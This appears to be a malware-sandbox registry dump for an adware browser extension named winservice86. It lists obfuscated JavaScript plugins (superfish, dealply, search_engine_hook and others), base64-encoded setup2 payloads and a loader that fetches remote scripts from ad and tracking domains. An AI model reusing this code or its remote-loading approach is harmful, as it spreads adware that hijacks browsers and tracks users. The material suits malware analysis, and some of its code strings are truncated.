    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Installer]
    "Time" = "1456422014"

    [HKCU\Software\winservice86\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""

    [HKCU\Software\winservice86\Installer]
    "CodeDownloadDomain" = "http://js.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\311]
    "Name" = "dealply_mac_m"

    [HKCU\Software\winservice86\Plugins\36]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/36.js"

    [HKCU\Software\winservice86\Plugins\102]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/102.js"

    [HKCU\Software\winservice86\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\winservice86\Plugins\311]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMWUxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAyNWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MDUwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1"

    [HKCU\Software\winservice86\Manifest]
    "PluginsManifestVersion" = "37"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppName" = "winservice86-bg.exe"

    [HKCU\Software\winservice86\Plugins\42]
    "Version" = "10"

    [HKCU\Software\winservice86\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\winservice86\Plugins\424]
    "Name" = "sharonl_vid_ws_m"

    [HKCU\Software\winservice86\Plugins\269]
    "Name" = "stats_ie"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\winservice86\Plugins\47]
    "Name" = "resources_background"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\winservice86\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\winservice86\Installer]
    "CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

    [HKCU\Software\winservice86\Plugins\380]
    "Name" = "callcenter_j_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayIcon" = "%Program Files%\winservice86\utils.exe"

    [HKCU\Software\winservice86\Plugins\3]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/3.js"

    [HKCU\Software\winservice86\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInȱ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "Policy" = "3"

    [HKCU\Software\winservice86\Plugins\262]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI"

    [HKCU\Software\winservice86\Plugins\104]
    "Version" = "12"

    [HKCU\Software\winservice86\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njk"

    [HKCU\Software\winservice86\Update]
    "LastCheck" = "1456422028"

    [HKCU\Software\winservice86\Plugins\345]
    "JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};"

    [HKCU\Software\winservice86\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\winservice86\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\winservice86\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Bic" = "8D4C23D6A4134239976F389726A57621IE"

    [HKCU\Software\winservice86\Plugins\4]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\46]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\275]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"

    [HKCU\Software\winservice86\Plugins\104]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/104.js"

    [HKCU\Software\winservice86\Plugins\4]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Plugins\246]
    "Version" = "15"

    [HKCU\Software\winservice86\Plugins\273]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/273.js"

    [HKCU\Software\winservice86\Plugins\221]
    "Version" = "4"

    [HKCU\Software\winservice86]
    "ActiveAppId" = "64755"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "Policy" = "3"

    [HKCU\Software\winservice86\Plugins\246]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/246.js"

    [HKCU\Software\winservice86\Plugins\46]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/46.js"

    [HKCU\Software\winservice86\Plugins\269]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/269.js"

    [HKCU\Software\winservice86\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\winservice86\Plugins\221]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/221.js"

    [HKCU\Software\winservice86\Installer]
    "StatsDomain" = "http://stats.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\200]
    "Name" = "foxydeal_m"

    [HKCU\Software\winservice86\Plugins\45]
    "Version" = "4"
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"

    [HKCU\Software\winservice86\Plugins\288]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\winservice86\Installer]
    "FullVersion" = "1.35.9.29"

    [HKCU\Software\winservice86\Plugins\273]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU"

    [HKCU\Software\InstalledBrowserExtensions\17638\Status]
    "Installed" = "1"

    [HKCU\Software\winservice86\Plugins\223]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/223.js"

    [HKCU\Software\winservice86\Manifest]
    "DisableIe" = "true"
    "RunInFrame" = "false"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "srcid_var" = "002201"

    [HKCU\Software\winservice86\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\winservice86\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\winservice86\Plugins\263]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "Publisher" = "Corporate Inc"

    [HKCU\Software\winservice86\Plugins\39]
    "Version" = "5"

    [HKCU\Software\winservice86\Manifest]
    "PublisherId" = "17638"

    [HKCU\Software\winservice86\Plugins\200]
    "Version" = "6"

    [HKCU\Software\winservice86\Plugins\376]
    "Name" = "loaderBackup"

    [HKCU\Software\winservice86\Plugins\223]
    "Version" = "8"

    [HKCU\Software\winservice86\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\winservice86\Plugins\195]
    "Version" = "28"

    [HKCU\Software\winservice86\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\winservice86\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\winservice86\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\winservice86\Plugins\91]
    "JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
    [HKCU\Software\winservice86\Plugins\94]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\376]
    "JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,httpsUrl:https://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE"

    [HKCU\Software\winservice86\Plugins\193]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\17638\Status]
    "Installed" = "1"

    [HKCU\Software\winservice86\Plugins\253]
    "URL" = "http://js.newcloudrack.com/plugins/mins/253.js"

    [HKCU\Software\winservice86\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"

    [HKCU\Software\winservice86\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\winservice86\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\winservice86\Installer]
    "zdata" = "0"

    [HKCU\Software\winservice86\Plugins\311]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\winservice86\Plugins\288]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNW